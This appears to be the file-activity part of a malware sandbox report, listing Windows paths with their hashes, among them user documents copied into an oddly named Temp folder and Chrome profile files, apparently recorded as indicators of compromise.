SHA256 b35217fa322fae0c4b0b271e9e31be8eca733786803e972bafc1670b90d54129
SHA512 5c19493313b2443158d8b9fa3350758b78cabd83992894d873e45385e1fa2f427b95484dba73af77ea5e3ea767cf8a516e9a0ad9fdcb1cf65d5021b70846cb49

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Music\CompleteBackup.emf

MD5 12247157a1b1caa9d9249e9787aaa844
SHA1 b2670c5d4bad1ccd0f287d8c37b244e486052cc8
SHA256 3301aaf7db5699bf310cf030cf8f6b996acede955f1e65b3d3176465ee148812
SHA512 60bbbdf0eda12f231de484aa4dd4bde4159b2e3b213729b2ff0a8a86b9f7bab39e9beb294ad015f4d2268927543e9567892b6ffaffc860883579c2b8e940a251

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Documents\ResetResume.csv

MD5 1b6d7987f31a7fb899fde89476dc9b53
SHA1 7f841df015551ef4333f7b5dc4781901e7444af9
SHA256 6bc3e9d8127b2f5943a450edd5295d072966a74a30b13b66df196968befb8b59
SHA512 9fbdda53dd079f294bbb71d231d497c6081be5b54d786d5035f87b0bfb0e6a7ec2f71bc6b594c1582709489494068af8f2ddf8e54ee319e9845c301eeace52c2

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Documents\Opened.docx

MD5 bfbc1a403197ac8cfc95638c2da2cf0e
SHA1 634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512 b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Documents\Files.docx

MD5 4a8fbd593a733fc669169d614021185b
SHA1 166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA512 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Documents\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Desktop\CheckpointFind.mp3

MD5 bdfbf90c981427daa2819fcc47294294
SHA1 741d922290a27f11bb411d3b6d491366495adb09
SHA256 2f49919673cb31f073d21de1aa87a0998ef3bdc1c1ef96526204d2261a194e19
SHA512 023ddf5aeae3a175fc1c3b01ae3814d255542ecf79113219df7c7aa469cbf553ab59266bbe2e013f34f99bee917f265888f17421517ef26c87a6c2ec2c94b94b

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Pictures\My Wallpaper.jpg

MD5 a51464e41d75b2aa2b00ca31ea2ce7eb
SHA1 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA256 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512 b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Pictures\SwitchOut.jpg

MD5 fba677f1eccf9a476c5d8b33b3a43d9e
SHA1 2111462f473b89cdc08afdca28495308bb07628f
SHA256 6b95c7cbdaaa24a7cceddfa79dc66bfedca52a75acece09c82857e6dfa167a34
SHA512 85b364d6ea4547f68cf61f099a47d2041b8ef0368ee6c930d8929fbc97de31300ae7aca041214943c8604efddd0b7afc66289477762f2ed1559a710c62b096ab

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Pictures\ResizeDisconnect.jpeg

MD5 03abd1908f311d52ecdb631ef20becee
SHA1 19831976de86be54dca908035104db64a669a5ba
SHA256 15dc294f2daaf62b41c33cf814c18742b570847f2721439834e1dc11d865347a
SHA512 80c51b50907e811150d46651ab2eb74ce5123cad27c12bd3df38d0234495327820ac2e8ffb4ff3022facf5a514067009d473a3ca88923656d4f4d798365efc7b

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Pictures\OptimizeConvertTo.jpg

MD5 167a49bb88a2c6dd0231b5d1275d78bf
SHA1 7f09adf1a95f606b7a8b9af747892f542a5c84cd
SHA256 bd13ea72cdd7653204e5a663593027d80778132401932fffc824ed64b252c4a3
SHA512 a6624e7fe6153fd01fcadb08d295916b275320724dec70e5192a6b9e391694aff44b709d42b0cce69e251a8aeebef182f84cff8bfe2907aeb4774f75c8e578ad

C:\Users\Admin\AppData\Local\Temp\β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€\Common Files\Pictures\SwitchSplit.jpeg

MD5 f51fe9ff9e13400fd279212016c3f6bb
SHA1 5cd7bf7305d588f03cb4f0b18aea54641a525285
SHA256 053f379e49d2d0fedc64f10271e07bacca5104f199200d85932012cf71bff6bd
SHA512 0f5476b1cbb6aaff4c7f3fcb4bbbd9d188037a5921efc18132d857f4629e94c5182f6b26788c8b80d01d1f5394012729c2eb008d822c4932d13b272d6031a1b3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 60a84ea8f3888e51bb0fe4856926a639
SHA1 43848b5a831f8fe7623694b36b17554b83770269
SHA256 5d219511d1091f4dc52ef6664815bcacf013c76b695bf2195aa439a6cc431504
SHA512 f6381deedc9612c96914173d948bd601192256c1b65a6b6be3c6664de84df64fb8740fa0205846e0380305bf5442e52991d134ff94b8edc899775befcc4a86ba

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c6aae9fb57ebd2ae201e8d174d820246
SHA1 58140d968de47bcf9c78938988a99369bbdb1f51
SHA256 bbc39a8da61fd8ec0d64e708e1ab4986f7fdf580581e464629bf040c595f7c08
SHA512 5959f7dab47bc4bad03635f497ca48f2e0740375528afddfc50964e54983e56df5970b25b8d8b28f1aa73cd6233fac83c634a311e759c58a365570e4862c3e3c

\??\pipe\crashpad_4920_YJYJWXXFJYKEEHSL

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\1107aee8-daad-4ccf-b58b-ed67a490c852.tmp

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 121aac0387d1f2694ce74c8fef572e21
SHA1 645cc5c6a8a7287a6f37ad7dcb0b68e3b779af02
SHA256 a283a97108c3249c1a770bb8ec72750af56f45cba42094af834829a87fae4b23
SHA512 5aef772d06f257138412d0c6bc60678f39cff68ad4d444eb2f986760f9cd786f1311ec5070ee466e90999b65351060711f764b6b262899573b1e9513451faa06

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\57871764-d455-4ddd-81c7-365ac9220fa3.tmp

MD5 db70e63fb40d0c1673e51814db052acc
SHA1 72bcd059eb99d9fb97324576b492fda8bd478a11
SHA256 15dcdd7f46697c0ea5092d5dc0a103854c48606212a851e1ced1971d578bd00c
SHA512 9f2be5dcae83700dd1865141643dcf168b1f55fbefe248703fa24dc87ed725f2ffcd0a7241d18cf5b6cc55193b25e393899c7b81ee4d4e3c08d4b92ea7fc95c1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 3f57bd8fa4cba8dc0d150627073a1227
SHA1 6b4bd816ef314f741b516770573159dc100b21ad
SHA256 003e2496cbf2d61118084f3bfeaeef7845a11fab0f08c501d8ef971f809ec28b
SHA512 063862d2c0288610ac68a2a6940058070684bff44f74be1365f85f0acd5557b6f6606a79ddf5f250feb517002fb558b59e898e2818e70e361dc7d63977b8183c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 3d367cd091876680a11602cb03e811d6
SHA1 f171d6be3934496d66bc05d32c19cee21a28b9de
SHA256 1f6d9882af4beef6e1eff0ac691a0663c6e29a9f8e77f6bb970d461694451771
SHA512 84e3aa38ed4f00fcdbda572032e04a9e9f46949c41e95e5eeed21d7e84d4645dc48c650f5f62f908f99154c5f21991ab1d776baeb72afe6387a7fc41a2d9b88a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1175b4b07c9621ca5baf21a202a92211
SHA1 7029bb2c159b17ec1ca1a80cdf72e176dec33a5d
SHA256 cb9ea89764da2405758d00a1946ba27cd42998ed3be642539e7a3171eb0942fa
SHA512 ecba43628657a773cff0f8e9cc5cbbcded1354004ad15a9c05eb7527b666fd50f84b974c23a9a270977f18f2d3960e8a1fb868fc591a2927e50dfbb60878a912

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 d3e50245153fe976be4e355f2fcea4be
SHA1 624ac0832eafbfbff5c625981eb23ac8d0f058d9
SHA256 b92320054d4248d3eed5298e665174179ec044714e3e237ed31fe9b2b7705537
SHA512 ca64502377462647245cded369955302836cd6817e8e7c8273647626e080a2c9b5481c42d970c1bf79c46259b0cc57691afb30ec78199623f2d2908aef6d0cf4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 3f9b44e3fcdb20bef02e9914fc466ed2
SHA1 c95b40e9721975205d564e5c20ec54b7fcbd77e2
SHA256 cd8f92a52cb0cff0629f2b12ae7fb92b4690d3981e268e96332d1c2b329848aa
SHA512 9a8e0c5013262abc9e19a33d80b4b7a2b0d31f8472001f35b11849c242aa444007772e016b1b1936b4107bf8ac506a2ac5741e654274cf897779e9e802de44e4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 a505287223e271dd3caf893a8f15fab0
SHA1 cd043aac2e0384d0679bef0f5eb5c1e5144f8e49
SHA256 40d8268e1969f7aedbf178270f0cc3cd7af05946b9ae2035ebcf119d33755082
SHA512 af65b1844c4b9243a64539511474057db755b70d08bf309bda2031b39b13b4688bf1787d663f0995f7f1eb3f27fba5fd354daf8c8305c0b8c3b8326458d28a32

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 6ff4ddeb0cfe9bc4903a797b9edea4b4
SHA1 1aabfb7b003ac918e29cf76358679bf1ad415da2
SHA256 6139f36b178aba5806bbcccc11f37f9c47ce6f63897478121bfacc43c250ab0e
SHA512 b3b2bba66bcef27e1bf3f0bea6bc14c0c4126c8e05ff8dab3aefdce7c08e6fc7dfc3c2ac71781d2d8e852733cd40c398611f6a5af0c3b3f739d18f7cf86e1d4f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 07bea70eaf2ad2ce002c6bf2e2d9d12b
SHA1 b2aec515b84050761b949ad9ee9da908f82618a8
SHA256 3b9ae63a27c1059a9089af81ec4b5b0300ed61e93cdc8f019485ee846b33bf46
SHA512 a8895816235120584c63eea963a10b2e6697726a2fbb5e442a6c544a7c92411b8a136ebbc3fb6d87c9f08f910e357bb68868822eaf2978f921f646cce41932a5

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 444fd300f57f350a73bd2b22f2fd15d2
SHA1 ba28680b43b0c3d5e347cf11b2ffb14528ce0def
SHA256 74921a4345f5826a65ae4b8ff263cd4256191580376189a59ecf640430131573
SHA512 ab6e929ddfff4716412daeb0fae41c31d22d9139538a21b841f90c74d1bf38ff42c09d091254ede543e98ee93598541c505895274d8153732388dd9a211ebec2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000024

MD5 585ac11a4e8628c13c32de68f89f98d6
SHA1 bcea01f9deb8d6711088cb5c344ebd57997839db
SHA256 d692f27c385520c3b4078c35d78cdf154c424d09421dece6de73708659c7e2a6
SHA512 76d2ed3f41df567fe4d04060d9871684244764fc59b81cd574a521bb013a6d61955a6aedf390a1701e3bfc24f82d92fd062ca9e461086f762a3087c142211c19

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f415b581a2c9d6d649a5c9967c846941
SHA1 c8c85518c7ea74464456990f127bb093f41f97e6
SHA256 2abaa6537dc3731e2fd34707fe23335ab243c16cf35e7d5811089fc27c0f2cac
SHA512 6c9759783648398c5f93819cdb3b2219b14eebc05ba1add190d820e0dfaf1aef21afb47f17231dce06824c15b902b7963debeb052e3ce8ab81378d89fb0735ac

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 5a192948842d852e1a77633cb26d3d9d
SHA1 9324aada14b9d81ce9bccfa138ffe2f9f229f934
SHA256 ad97f8e2f898f9294ae8b03d3a0d5f388c5e46cd55cd2572d93024c65adc9133
SHA512 75de8525cdd1ea463c118547d6d6fb8bd328eb1643784cf6825bfc363f0433c147f6a77c2fbca810c2591964554aaa27b46de9caa1109f6110fed9e9f5c4d938

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 40d5dcb9c0313a67b61e4e7281995c91
SHA1 b5ab966f2d55c3884b89fd8dfdd29c57416722bf
SHA256 bf4c9d6413ec1e68de3198aaeb97287a30eba4407dc9aa4850e676b991ea54da
SHA512 f464ef48daf2a4251f45dfeeb7c40c9b3fd4bd1d268fb3f029b02894cfe96ff4f558871ee5f67686fcd3ce92d9f2ae45b0b78c3dfa8d5db5bfebbc9b71716674

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000023

MD5 f782de7f00a1e90076b6b77a05fa908a
SHA1 4ed15dad2baa61e9627bf2179aa7b9188ce7d4e1
SHA256 d0b96d69ee7f70f041f493592de3805bfb338e50babdee522fcf145cb98fc968
SHA512 78ec6f253e876d8f0812a9570f6079903d63dd000458f4f517ec44c8dd7468e51703ea17ecce2658d9ea1fdb5246c8db5887a16be80115bbf71fe53f439d8766

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 9184db83e6f02526b19df6d4aa4ed97b
SHA1 8499df68482cfeea4f635206333ddb0816f65418
SHA256 8492f88bf69bb6f8dd2fae419c85bb253bf376f0384e70fe97ef82afc8e7df46
SHA512 f2a4ed33ba7f6d6d2878c8d0e9bf23d285e8c6f32200365c1d9925cd65999faba08df34cec7e543ea1c800d569a02e84a02b8a6f6a48e06edd8e2c78cc99ac27

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 91e4c3c30df373fe29daf75b661b8ec3
SHA1 995fbe4516398134d3c6e6e1efaff551ec0bb44f
SHA256 6cf2910c2b3f0320d445a9f98631600d040872f950fea5591f832e04f857d5e7
SHA512 4e62385b74d77f16627e571b0720d235a7ddfde6aac6505729774273c20edc3faeb741dd8e0fb7bcd76ff6a75019750e568be9e2ee414fc030f8028e05acc268

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 62a8720cee7b043c7c448dc6e7412688
SHA1 c6efe42e12e93e0bcf4ac167237d095722bb3946
SHA256 05b091094e69be8332d031fb343b69748b6be6b6c4e95ce473d48b36785c37bc
SHA512 4e48ad376044ef9baa35a541874cf16cf9a8cd8cd625a5ce7da3fd0ed1d1876eaa4653e7690919a191dd74907ab272697ab53c4aa7142ef2fa67e5b02923b958

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 43c829d9a690226590dc49cd585bd401
SHA1 6e7466685b77f5c5aa08c14c516b140a881c1e6e
SHA256 29765ec1ed0e5711feec81c70dd4a8d4d1efbc1beb72df2984c3734d2550e4ac
SHA512 ae6dd38e58f463d9df17fee4981f1444921be1010fce0176c2681ef24ca83b6813ce5742ce7db5ffaad13c9c8a5504c9ab312138728c17fd608c1411bfdf2efb